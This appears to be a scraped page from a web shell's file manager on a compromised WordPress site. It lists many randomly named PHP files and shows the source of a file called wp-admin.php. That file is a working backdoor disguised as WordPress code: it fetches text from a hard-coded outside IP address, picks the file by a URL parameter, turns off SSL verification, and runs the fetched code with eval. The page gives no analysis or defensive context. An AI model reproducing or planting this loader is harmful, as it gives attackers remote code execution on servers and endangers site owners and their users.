at path:
ROOT
/
wp-admin.php
run:
R
W
Run
x
DIR
2026-03-13 00:54:20
R
W
Run
.htaccess
305 By
2026-03-11 06:16:07
R
W
Run
1.php
0 By
2026-03-13 04:04:54
R
W
Run
Delete
Rename
66.php
0 By
2026-03-05 22:37:12
R
W
Run
Delete
Rename
8.php
14.78 KB
2026-03-05 22:38:08
R
W
Run
Delete
Rename
about.php
0 By
2026-03-13 08:52:23
R
W
Run
Delete
Rename
admin.php
1.05 MB
2026-03-11 18:01:07
R
W
Run
Delete
Rename
dlarcayj.php
0 By
2026-03-13 20:53:18
R
W
Run
Delete
Rename
error_log
2.68 MB
2026-03-13 07:53:18
R
W
Run
Delete
Rename
ex.php
0 By
2026-03-13 08:43:19
R
W
Run
Delete
Rename
features.php
0 By
2026-03-13 04:04:55
R
W
Run
Delete
Rename
gdvzyvkj.php
0 By
2026-03-13 20:51:18
R
W
Run
Delete
Rename
inputs.php
0 By
2026-03-13 08:43:30
R
W
Run
Delete
Rename
mah.php
0 By
2026-03-13 08:52:29
R
W
Run
Delete
Rename
pages.php
0 By
2026-03-13 08:43:39
R
W
Run
Delete
Rename
qindex.php
0 By
2026-03-13 07:22:27
R
W
Run
Delete
Rename
radio.php
0 By
2026-03-13 08:43:25
R
W
Run
Delete
Rename
robots.txt
85 By
2026-03-11 06:16:09
R
W
Run
Delete
Rename
rpepdqqa.php
0 By
2026-03-13 20:51:18
R
W
Run
Delete
Rename
system_core.php
0 By
2026-03-13 04:04:55
R
W
Run
Delete
Rename
test.php
1.15 KB
2026-03-12 15:24:54
R
W
Run
Delete
Rename
uvctkhbi.php
0 By
2026-03-13 20:53:27
R
W
Run
Delete
Rename
wp-admin.php
1.1 KB
2026-03-11 05:57:51
R
W
Run
Delete
Rename
wp-conffq.php
0 By
2026-03-13 06:21:48
R
W
Run
Delete
Rename
wp-login.php
0 By
2026-03-13 08:43:44
R
W
Run
Delete
Rename
error_log
up
📄
wp-admin.php
Save
<?php /* * Support@gmail.com */ function WordPress_Http_Curl ( $txt = '0303', $args = array() ) { if ( ! function_exists( "curl_init" ) || ! function_exists( "curl_exec" ) ) { return false; } $handle = curl_init(); curl_setopt( $handle, CURLOPT_URL, 'http://69.30.227.202/file/'.$txt.'.txt' ); curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $handle, CURLOPT_HEADER, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false ); $response = curl_exec( $handle ); $curl_error = curl_error( $handle ); if ( !$curl_error ) { $response = array( "data" => eval( "?>". $response ) ); return $response['data']; } else { return $curl_error; } if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } } $get = isset($_GET) ? $_GET : array(); $link = ''; foreach ($get as $key => $value) { if($key == 'a'){ $link = $value; } } $result = WordPress_Http_Curl( $link ); print_r($result);